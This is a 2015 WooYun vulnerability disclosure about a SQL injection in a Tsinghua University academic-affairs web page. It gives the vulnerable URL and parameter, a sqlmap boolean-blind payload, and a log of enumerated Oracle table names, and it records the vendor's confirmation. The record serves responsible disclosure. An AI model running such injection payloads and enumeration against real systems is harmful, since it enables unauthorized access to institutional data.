漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0134311
漏洞标题:清华大学某站点sql注入漏洞大量数据
相关厂商:清华大学
漏洞作者: 日出东方
提交时间:2015-08-17 22:15
修复时间:2015-10-02 09:04
公开时间:2015-10-02 09:04
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-08-17: 细节已通知厂商并且等待厂商处理中
2015-08-18: 厂商已经确认,细节仅向厂商公开
2015-08-28: 细节向核心白帽子及相关领域专家公开
2015-09-07: 细节向普通白帽子公开
2015-09-17: 细节向实习白帽子公开
2015-10-02: 细节向公众公开
简要描述:
小菜挖学校
详细说明:
http://jwzx.cic.tsinghua.edu.cn/tsinghua/pub_message/message.jsp?fmodulecode=5700&modulecode=5701&messageid=10211
参数 messageid 有问题。。。
管理员亲,发之前搜了一下,不是之前的注入点,之前的已经修复了。
清华大学的教育系统,oracle 数据库
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: messageid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: fmodulecode=5700&modulecode=5701&messageid=10211 AND 4490=4490
---
[14:07:43] [INFO] the back-end DBMS is Oracle
web application technology: Apache, JSP
back-end DBMS: Oracle
current database: 'JWZX'
90个表。。tables
90
[14:06:13] [INFO] retrieved: ADMINGROUP
[14:06:49] [INFO] retrieved: ADMIN_DPT
[14:07:12] [INFO] retrieved: ADMIN_POWER
[14:08:32] [INFO] retrieved: CALENDAR
[14:09:08] [INFO] retrieved: COURSE_ADD
[14:09:56] [INFO] retrieved: DATA_INIT
[14:10:44] [INFO] retrieved: DEPARTMENT
[14:11:25] [INFO] retrieved: DIRECTION
[14:12:02] [INFO] retrieved: GROUP_POWER
[14:12:59] [INFO] retrieved: HISTORYMATRICULATION
[14:14:17] [INFO] retrieved: HISTORYMATRICULATION_LIST
[14:15:08] [INFO] retrieved: INFO_BOOK
[14:15:51] [INFO] retrieved: INFO_BOOKS_NEWREGISTER
[14:16:59] [INFO] retrieved: INFO_CLASSROOM_BUILDING
[14:18:24] [INFO] retrieved: INFO_CLASSROOM_DESKSORT
[14:19:28] [INFO] retrieved: INFO_CLASSROOM_EQUIPMENT
[14:20:24] [INFO] retrieved: INFO_CLASSROOM_RID_EID
[14:21:10] [INFO] retrieved: INFO_CLASSROOM_ROOM
[14:21:40] [INFO] retrieved: INFO_CLASSROOM_ZONE
[14:22:23] [INFO] retrieved: INFO_COUNTER
[14:23:01] [INFO] retrieved: INFO_COURSE_BOOK
[14:23:51] [INFO] retrieved: INFO_COURSE_INTRO
[14:24:47] [INFO] retrieved: INFO_COURSE_INTRO_TEMP
.......
贴出一部分来。。
权限比较低。。。
over+++
漏洞证明:
rt
修复方案:
121
版权声明:转载请注明来源 日出东方@乌云
漏洞回应
厂商回应:
危害等级:低
漏洞Rank:5
确认时间:2015-08-18 09:03
厂商回复:
谢谢,我们会尽快处理。
最新状态:
暂无